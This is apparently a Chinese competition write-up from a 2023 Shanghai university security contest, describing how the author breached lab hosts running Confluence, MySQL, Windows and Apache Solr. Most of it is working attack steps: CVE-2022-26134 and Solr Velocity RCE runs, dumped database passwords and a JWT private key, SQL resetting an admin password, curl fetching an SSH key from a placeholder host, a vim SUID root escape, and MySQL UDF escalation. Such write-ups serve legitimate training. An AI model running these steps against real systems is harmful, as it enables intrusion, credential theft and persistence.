其他
原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(下)
引言
第八届上海市大学生网络安全大赛
暨“磐石行动”2023(首届)大学生网络安全邀请赛
—— CTF比赛
2023.5.20 9:00 - 21:00
—— 漏洞挖掘比赛
2023.5.21 00:00 - 2023.5.22 24:00
由于文章写得有点长,干脆拆分成了上下篇,上篇主要写了下场景1和场景3的
那这个下篇接着来记录一下场景2和场景4的漏洞挖掘过程。
既然是Workthrough,那文中必然有不少走错路的时候,说不定还有写得不对的地方,师傅们看的时候就当听故事好了(哈哈)
漏洞挖掘场景2【1/4】
(icmp) Target 10.103.252.84 is alive[*] Icmp alive hosts len is: 110.103.252.84:22 open10.103.252.84:3306 open10.103.252.84:8090 open[*] alive ports len is: 3
重新扫 (icmp) Target 10.103.187.168 is alive[*] Icmp alive hosts len is: 110.103.187.168:22 open10.103.187.168:3306 open10.103.187.168:8090 open10.103.187.168:8091 open[*] alive ports len is: 4start vulscan[*] WebTitle: http://10.103.187.168:8091 code:204 len:0 title:None[*] WebTitle: http://10.103.187.168:8090 code:302 len:0 title:None 跳转url: http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true[*] WebTitle: http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true code:200 len:33317 title:登录 - Confluence[+] InfoScan:http://10.103.187.168:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]http://10.103.252.84/
http://10.103.252.84:8090/
基于 Atlassian Confluence 7.14.2 技术构建
CVE-2022-26134 Confluence OGNL RCE 漏洞分析
https://www.anquanke.com/post/id/274026
天下大木头师傅的 Confluence CVE-2022-26134 漏洞分析
http://wjlshare.com/archives/1755
Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability
https://github.com/nxtexploit/CVE-2022-26134
$ python CVE-2022-26134.py http://10.103.252.84:8090/ idConfluence target version: [1;94m7.14.2[1;muid=1001(confluence) gid=1001(confluence) groups=1001(confluence)
$ uname -aLinux localhost 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
NAME="CentOS Linux" VERSION="7 (Core)" ID="centos" ID_LIKE="rhel fedora" VERSION_ID="7" PRETTY_NAME="CentOS Linux 7 (Core)" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:centos:centos:7" HOME_URL="https://www.centos.org/" BUG_REPORT_URL="https://bugs.centos.org/" CENTOS_MANTISBT_PROJECT="CentOS-7" CENTOS_MANTISBT_PROJECT_VERSION="7" REDHAT_SUPPORT_PRODUCT="centos" REDHAT_SUPPORT_PRODUCT_VERSION="7"
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:998:995::/var/lib/chrony:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false confluence:x:1001:1001:Atlassian Confluence:/home/confluence:/bin/bash
$ ls /bin boot dev etc home lib lib64 media mnt network.ini opt proc root run sbin srv sys tmp usr var
$ pwd/opt/atlassian/confluence/bin
$ lsbootstrap.jar catalina.bat catalina.sh catalina-tasks.xml ciphers.bat ciphers.sh commons-daemon.jar configtest.bat configtest.sh confluence-context-path-extractor.jar daemon.sh digest.bat digest.sh display-help.bat display-help.sh install_linux_service.sh makebase.bat makebase.sh OS X - Run Confluence In Background.command OS X - Run Confluence In Terminal Window.command OS X - Stop Confluence.command service.bat setclasspath.bat setclasspath.sh setenv.bat setenv.sh setjre.bat setjre.sh setup_user.sh shutdown.bat shutdown.sh start-confluence.bat start-confluence.sh startup.bat startup.sh stop-confluence.bat stop-confluence.sh synchrony synchrony-proxy-watchdog.jar tcnative-1.dll tomcat9.exe tomcat9w.exe tomcat-juli.jar tool-wrapper.bat tool-wrapper.sh update-acl-for-custom-confluence-folder.bat user.sh version.bat version.sh
$ envOLDPWD=/opt/atlassian/confluence JDK_JAVA_OPTIONS= --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED JAVA_OPTS=-javaagent:/opt/atlassian/atlassian-agent-v1.3.1/atlassian-agent.jar -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 JRE_HOME=/opt/atlassian/confluence/jre/ START_CONFLUENCE_JAVA_OPTS=-Datlassian.plugins.startup.options='' PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin PWD=/opt/atlassian/confluence/bin LANG=en_US.UTF-8 CATALINA_OPTS=-Datlassian.plugins.startup.options='' -Dorg.apache.tomcat.websocket.DEFAULT_BUFFER_SIZE=32768 -Dconfluence.context.path= -Djava.locale.providers=JRE,SPI,CLDR -Dsynchrony.enable.xhr.fallback=true -Datlassian.plugins.enable.wait=300 -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2023-05-20_21-14-22.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -Xlog:gc+age=debug:file=/opt/atlassian/confluence/logs/gc-2023-05-20_21-14-22.log::filecount=5,filesize=2M -XX:G1ReservePercent=20 -XX:+UseG1GC -XX:+ExplicitGCInvokesConcurrent -XX:+PrintGCDateStamps -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=256m -Xms1024m -Xmx1024m CONFLUENCE_CONTEXT_PATH= CONF_USER=confluence SHLVL=4 CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid _=/opt/atlassian/confluence/jre//bin/java HOME=flag在/root/目录下,当前用户权限,找个地方提权,mysql?
数据库的配置文件
$ python CVE-2022-26134.py http://10.103.252.84:8090/ "cat /var/atlassian/application-data/confluence/confluence.cfg.xml"Confluence target version: [1;94m7.14.2[1;m<?xml version="1.0" encoding="UTF-8"?> <confluence-configuration> <setupStep>complete</setupStep> <setupType>custom</setupType> <buildNumber>8803</buildNumber> <properties> <property name="admin.ui.allow.daily.backup.custom.location">false</property> <property name="admin.ui.allow.manual.backup.download">false</property> <property name="admin.ui.allow.site.support.email">false</property> <property name="atlassian.license.message">AAABLA0ODAoPeJxtkFtLwzAUgN/zKwI+Z6ytRRQCZm0Y0zYdttv0MatnGsiykktx/97s9iLCeTm3j ++cuy4AZoPFaY6T/CnJYuCi7XA6TTNUguutGrw6GFoczE4HMD0gEfZbsM1u5cA6ShJUWJCnoVJ6o KdNMr0naY7ijpe9F3IP1IPzCeojZRJLaowVG+A2wmupNFVmVE5tNTy7HgxMjEZ8lDqc4XQntYMLo VKx76A7DnCGF01d87diwSoUQcaDkVGU/wzKHi9SWfZAkvQkdQbcTih0cB6sOHyCo1PUckE/mhWu2 SvHNccMt6zESyZKNkGN/ZJGuYuMEmvVqlnFccdZjVqwI9hFSWfzJifzuViR5PF9QzYv7RpdbWO3W pS37H+5ZbD9t3Tw55O/GO2IwTAsAhRUWCE6ipB5qHBRf+XtHnqnX1gdHgIUFvOiPKmn4ZhUVuqgO F6E9COcGh8=X02f3</property> <property name="attachments.dir">${confluenceHome}/attachments</property> <property name="confluence.setup.locale">zh_CN</property> <property name="confluence.setup.server.id">BGO5-GGNU-19XW-WJSV</property> <property name="confluence.webapp.context.path"></property> <property name="finalizedBuildNumber">8803</property> <property name="hibernate.c3p0.validate">true</property> <property name="hibernate.connection.autocommit">false</property> <property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property> <property name="hibernate.connection.isolation">2</property> <property name="hibernate.connection.password">Confluence.123</property> <property name="hibernate.connection.provider_class">com.atlassian.confluence.impl.hibernate.DelegatingHikariConnectionProvider</property> <property name="hibernate.connection.url">jdbc:mysql://localhost/confluence?sessionVariables=tx_isolation='READ-COMMITTED'</property> <property name="hibernate.connection.username">confluence</property> <property name="hibernate.database.lower_non_ascii_supported">true</property> <property name="hibernate.dialect">com.atlassian.confluence.impl.hibernate.dialect.MySQLDialect</property> <property name="hibernate.hikari.idleTimeout">30000</property> <property name="hibernate.hikari.maximumPoolSize">60</property> <property name="hibernate.hikari.minimumIdle">20</property> <property name="hibernate.hikari.registerMbeans">true</property> <property name="hibernate.setup">true</property> <property name="jwt.private.key">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</property> <property name="jwt.public.key">MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAwPN47Iz3qCt2p045u43/4rGwccTPfuJ/u6JAfTQ+9TjtJskRUAwZmEnhqhtfNDcoAUzv0TXfxlrfbznJb1caNoG4uPlXZg6WA9HAqxeEwTf4QWO434QX/DYRBsoeQI0qhqYRTAgUV7vLZzaMa9VRyj2VWVwu8gRWEvcA1UA+uPiel7IlBe2xazY9ZFnB3SsR1FdZxasgEb6EW8iBN9ZBozVt0RwlA+Bdn5MpzQoYPq+7avL1Dh5X1uuW3K1ADFG1CPa0hJ7DrtaNYGmeWTuAOXrjQNiYevtduLZ0rPZPT6rwAD6aCmu6VvVKU5FL2aeoOidEack7BKKFaiDaGMP4OasDpPKYl49tWuIwbqw+xizhzu5uuBKTkhE3Vjm6zRgsG9u6wtbmm7h5BUgzoi91MvLdx/4JuhrFGr0hXnGvtimymbiqcRO+AKWaJVgns1AbkPEgC5OoJmEtl8NFT4bIn/1hW4AXOT64u0sR9thhcWAybN9ZUV4NkCa+fNLd5c0NAgMBAAE=</property> <property name="lucene.index.dir">${localHome}/index</property> <property name="spring.datasource.hikari.registerMbeans">true</property> <property name="synchrony.encryption.disabled">true</property> <property name="synchrony.proxy.enabled">true</property> <property name="webwork.multipart.saveDir">${localHome}/temp</property> </properties> </confluence-configuration>数据库 3306
confluence
Confluence.123
5.7.42
好像是 mysql 权限,也没 root
还得提权?参考 confluence 忘记密码
https://www.jianshu.com/p/7cc8ea59578a
cwd_user 表
admin{PKCS5S2}zpwacMtAM1bWGcw8W+dVDjt2BFP3BwDXzYcvM6yXYatgXmWq+aOtOQ+GrgFc5FYw
select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';
458753
update cwd_user set credential ='{PKCS5S2}ltrb9LlmZ0QDCJvktxd45WgYLOgPt2XTV8X7av2p0mhPvIwofs9bHYVz2OXQ6/kF'where id=458753;修改密码为 Ab123456,登录
还得提权?
shell 弹不回来好难受,只能正向打啊啊啊
可以弹公网
但是不如直接写私钥然后 ssh 登录
python CVE-2022-26134.py http://10.103.187.168:8090/ "mkdir /home/confluence/.ssh/"
python CVE-2022-26134.py http://10.103.187.168:8090/ "curl vpsip:port/authorized_keys -o /home/confluence/.ssh/authorized_keys"Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
看看sudo提权或者CVE-2021-4034 pwnkit那个
看起来都不行
入口 flag1 192.168.0.12
vim 有 suid 权限
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'sh-4.2# cat /root/flagflag{dST7HmECAWgnrv6jDP9Yex18O2QGiVa0}sh-4.2#sh-4.2# cat /root/提示.txt管理员留下这些字符串也不知道做什么用192.168.0.552W2mg^v6B6UJNR@Svs内网
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450 inet 10.103.187.168 netmask 255.255.0.0 broadcast 10.103.255.255 inet6 fe80::5054:7fff:fe39:dae6 prefixlen 64 scopeid 0x20<link> ether 52:54:7f:39:da:e6 txqueuelen 1000 (Ethernet) RX packets 240175 bytes 22037866 (21.0 MiB) RX errors 0 dropped 331 overruns 0 frame 0 TX packets 29026 bytes 5772108 (5.5 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450 inet 192.168.0.12 netmask 255.255.255.0 broadcast 192.168.0.255 inet6 fe80::5054:53ff:fe6e:8ffc prefixlen 64 scopeid 0x20<link> ether 52:54:53:6e:8f:fc txqueuelen 1000 (Ethernet) RX packets 70 bytes 8372 (8.1 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 7 bytes 586 (586.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 393857 bytes 49735606 (47.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 393857 bytes 49735606 (47.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(icmp) Target 192.168.0.12 is alive(icmp) Target 192.168.0.33 is alive(icmp) Target 192.168.0.55 is alive[*] Icmp alive hosts len is: 3192.168.0.33:6379 open192.168.0.55:3306 open192.168.0.12:3306 open192.168.0.55:445 open192.168.0.55:139 open192.168.0.55:135 open192.168.0.33:22 open192.168.0.12:8091 open192.168.0.12:8090 open192.168.0.12:22 open[*] alive ports len is: 10start vulscan[*] NetBios: 192.168.0.55 WORKGROUP\WIN-FGHCOKNHM7P Windows Server 2016 Datacenter 14393[*] WebTitle: http://192.168.0.12:8091 code:204 len:0 title:None[*] WebTitle: http://192.168.0.12:8090 code:302 len:0 title:None 跳转url: http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true[*] WebTitle: http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true code:200 len:33317 title:登录 - Confluence[+] InfoScan:http://192.168.0.12:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]192.168.0.55 win
2W2mg^v6B6UJNR@Svs
用上面的连接信息连
3389 是不是没开不让连啊。。
是不是哪里锅了
噢,还有 3306 啊
MySQL 5.5.53
直接 udf 提权
-- select @@basedir;-- C:/Program Files/MySQL/MySQL Server 5.5/
SELECT 0x4d5a90000300000004000000ffff0000...0000000000 INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.5\\lib\\plugin\\udf.dll';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';select sys_eval('whoami');系统权限好啊!
C A696-C4FC
C:\Users ¼
2023/03/24 15:05 <DIR> .2023/03/24 15:05 <DIR> ..2023/05/05 14:40 <DIR> Administrator2018/02/03 08:23 <DIR> Public 0 0 4 ¼ 126,700,122,112
C A696-C4FC
C:\Users\Administrator\Desktop ¼
2023/05/10 22:18 <DIR> .2023/05/10 22:18 <DIR> ..2023/05/05 14:39 1,190 RedisDesktopManager.lnk 1 1,190 2 ¼ 126,700,122,112
Windows IP
2:
DNS . . . . . . . : IPv6 . . . . . . . . : fe80::2caf:f7d7:cd87:c5dc%5 IPv4 . . . . . . . . . . . . : 192.168.0.55 . . . . . . . . . . . . : 255.255.255.0 . . . . . . . . . . . . . :
Reusable ISATAP Interface {1798E6ED-B1D3-4DA3-A24B-2CE5D2862706}:
. . . . . . . . . . . . : DNS . . . . . . . :
\\
-------------------------------------------------------------------------------Administrator DefaultAccount Guest
: 192.168.0.55 --- 0x5 Internet 192.168.0.12 52-54-53-6e-8f-fc 192.168.0.255 ff-ff-ff-ff-ff-ff 224.0.0.22 01-00-5e-00-00-16 224.0.0.252 01-00-5e-00-00-fc 239.255.255.250 01-00-5e-7f-ff-fa 255.255.255.255 ff-ff-ff-ff-ff-ff
PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 708 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1800 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 828 TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 440 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 964 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 836 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 836 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 1620 TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 560 TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 1512 TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 568 TCP 192.168.0.55:139 0.0.0.0:0 LISTENING 4 TCP 192.168.0.55:3306 192.168.0.12:43636 ESTABLISHED 1800 TCP 192.168.0.55:3306 192.168.0.12:43702 ESTABLISHED 1800 TCP 192.168.0.55:3306 192.168.0.12:43798 ESTABLISHED 1800 TCP [::]:135 [::]:0 LISTENING 708 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:3389 [::]:0 LISTENING 828 TCP [::]:5985 [::]:0 LISTENING 4 TCP [::]:47001 [::]:0 LISTENING 4 TCP [::]:49664 [::]:0 LISTENING 440 TCP [::]:49665 [::]:0 LISTENING 964 TCP [::]:49666 [::]:0 LISTENING 836 TCP [::]:49667 [::]:0 LISTENING 836 TCP [::]:49668 [::]:0 LISTENING 1620 TCP [::]:49669 [::]:0 LISTENING 560 TCP [::]:49670 [::]:0 LISTENING 1512 TCP [::]:49671 [::]:0 LISTENING 568 UDP 0.0.0.0:123 *:* 320 UDP 0.0.0.0:500 *:* 836 UDP 0.0.0.0:3389 *:* 828 UDP 0.0.0.0:4500 *:* 836 UDP 0.0.0.0:5050 *:* 320 UDP 0.0.0.0:5353 *:* 1032 UDP 0.0.0.0:5355 *:* 1032 UDP 127.0.0.1:1900 *:* 3200 UDP 127.0.0.1:49704 *:* 3200 UDP 192.168.0.55:137 *:* 4 UDP 192.168.0.55:138 *:* 4 UDP 192.168.0.55:1900 *:* 3200 UDP 192.168.0.55:49703 *:* 3200 UDP [::]:123 *:* 320 UDP [::]:500 *:* 836 UDP [::]:3389 *:* 828 UDP [::]:4500 *:* 836 UDP [::]:5353 *:* 1032 UDP [::]:5355 *:* 1032 UDP [::1]:1900 *:* 3200 UDP [::1]:49702 *:* 3200 UDP [fe80::2caf:f7d7:cd87:c5dc%5]:1900 *:* 3200 UDP [fe80::2caf:f7d7:cd87:c5dc%5]:49701 *:* 3200
PID # ========================= ======== ================ =========== ============System Idle Process 0 Services 0 4 KSystem 4 Services 0 132 Ksmss.exe 268 Services 0 1,072 Kcsrss.exe 360 Services 0 4,068 Kcsrss.exe 432 Console 1 3,688 Kwininit.exe 440 Services 0 5,048 Kwinlogon.exe 492 Console 1 13,128 Kservices.exe 560 Services 0 6,868 Klsass.exe 568 Services 0 13,480 Ksvchost.exe 652 Services 0 13,160 Ksvchost.exe 708 Services 0 8,000 Kdwm.exe 820 Console 1 29,492 Ksvchost.exe 828 Services 0 13,256 Ksvchost.exe 836 Services 0 43,116 Ksvchost.exe 908 Services 0 17,144 Ksvchost.exe 964 Services 0 13,080 Ksvchost.exe 320 Services 0 15,656 Ksvchost.exe 628 Services 0 15,600 Ksvchost.exe 1032 Services 0 19,308 Ksvchost.exe 1040 Services 0 6,952 Ksvchost.exe 1512 Services 0 6,660 Kspoolsv.exe 1620 Services 0 15,552 Ksvchost.exe 1672 Services 0 19,412 Kdllhost.exe 1748 Services 0 7,576 Kmysqld.exe 1800 Services 0 31,636 Ksvchost.exe 1848 Services 0 7,956 KMsMpEng.exe 1900 Services 0 167,532 Kqemu-ga.exe 1916 Services 0 8,544 Kdllhost.exe 2044 Services 0 12,448 Kmsdtc.exe 2184 Services 0 9,632 KLogonUI.exe 2580 Console 1 41,408 Ksvchost.exe 3200 Services 0 6,564 Kcmd.exe 2420 Services 0 2,756 Kconhost.exe 2292 Services 0 7,020 Ktasklist.exe 2800 Services 0 7,756 KWmiPrvSE.exe 3756 Services 0 8,464 Kmimikatz 被杀了。。
MsMpEng.exe <=> Microsoft Security Essentials
直接加个账号连上去,然后关掉 win defender,然后 dump
啥也没有啊
不过Administrator的桌面上有个Redis客户端,估计连的是192.168.0.33:6379这个
感觉这台机器上哪里存了密码
赛后看了其他队wp发现要解本机的NTLM hash然后拿去cmd5解密得到明文密码,用这个密码就能登录redis然后进一步弹shell
好吧,摸了
漏洞挖掘场景4【2/3】
10.103.31.38:22 open10.103.31.38:8983 open[*] alive ports len is: 2start vulscan[*] WebTitle:http://10.103.31.38:8983 code:302 len:0 title:None 跳转url: http://10.103.31.38:8983/solr/[*] WebTitle:http://10.103.31.38:8983/solr/ code:200 len:14543 title:Solr Admin[+] http://10.103.31.38:8983 poc-yaml-solr-cve-2019-0193[+] http://10.103.31.38:8983 poc-yaml-solr-velocity-template-rceflag1 192.168.33.39 apache_solr
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template/tree/master
$ python apache_solr_exec.py 10.103.31.38 8983OS Realese: Linux, OS Version: 3.10.0-1160.80.1.el7.x86_64if remote exec failed, you should change your command with right os platform
Init node test1 Successfully, exec command=whoamiRCE Successfully @Apache Solr node test1 root
Init node test2 Successfully, exec command=whoamiRCE Successfully @Apache Solr node test2 root
Init node test3 Successfully, exec command=whoamiRCE Successfully @Apache Solr node test3 root
Init node test4 Successfully, exec command=whoamiRCE Successfully @Apache Solr node test4 root
Init node test5 Successfully, exec command=whoamiRCE Successfully @Apache Solr node test5 root # ls -al /rootRCE Successfully @Apache Solr node test1 total 52dr-xr-x---. 4 root root 216 May 20 23:25 .dr-xr-xr-x. 17 root root 263 May 20 23:25 ..-rw-------. 1 root root 6880 Nov 11 2022 anaconda-ks.cfg-rw------- 1 root root 76 May 12 06:40 .bash_history-rw-r--r--. 1 root root 18 Dec 29 2013 .bash_logout-rw-r--r--. 1 root root 176 Dec 29 2013 .bash_profile-rw-r--r--. 1 root root 176 Dec 29 2013 .bashrc-rw-r--r--. 1 root root 100 Dec 29 2013 .cshrc-rw-r--r-- 1 root root 38 May 20 23:25 flag-rw-------. 1 root root 6587 Nov 11 2022 original-ks.cfgdrwxr-xr-x 9 root root 201 May 4 09:02 solr-7.7.2drwx------. 2 root root 29 Apr 12 10:03 .ssh-rw-r--r--. 1 root root 129 Dec 29 2013 .tcshrc-rw------- 1 root root 4836 May 7 05:52 .viminfo
# cat /root/flagflag{hPucBnCtxSl38JG4orYW2a5diqUpejH7}
# ip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000 link/ether 52:54:6d:2a:35:d8 brd ff:ff:ff:ff:ff:ff inet 10.103.32.51/16 brd 10.103.255.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::5054:6dff:fe2a:35d8/64 scope link valid_lft forever preferred_lft forever3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc pfifo_fast state UP group default qlen 1000 link/ether 52:54:5d:70:af:3f brd ff:ff:ff:ff:ff:ff inet 192.168.33.39/24 brd 192.168.33.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80::5054:5dff:fe70:af3f/64 scope link valid_lft forever preferred_lft forever
# ip rdefault via 10.103.0.1 dev eth010.103.0.0/16 dev eth0 proto kernel scope link src 10.103.32.51192.168.33.0/24 dev eth1 proto kernel scope link src 192.168.33.39
python apache_solr_exec.py 10.103.32.51 8983 "curl vpsip:port/authorized_keys -o /root/.ssh/authorized_keys"直接加个 key 然后 ssh 上去
内网 192.168.33
扫内网
